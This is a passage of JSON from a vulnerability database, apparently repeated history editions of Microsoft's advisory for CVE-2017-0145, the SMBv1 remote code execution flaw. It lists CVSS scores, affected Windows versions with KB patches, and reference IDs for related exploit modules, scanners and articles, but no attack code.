for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:45:12", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T18:58:50", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3205409", "KB4012216", "KB3213986", "KB3212646", "KB4012213", "KB3210720", "KB4013429", "KB4012606", "KB4014077", "KB4012214", "KBMS16-110, 3187754", "KB4012217", "KB4012215", "KB4013198", "KB3177186", "KB3210721", "KB4012598", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:58:50", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T20:44:44", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3205409", "KB4012215", "KB3213986", "KBMS16-110, 3187754", "KB4014077", "KB3210721", "KB4013429", "KB4013198", "KB4012214", "KB3177186", "KB4012213", "KB4012212", "KB3205401", "KB4012598", "KB4012216", "KB3210720", "KB3212646", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:44:44", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T08:48:00", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 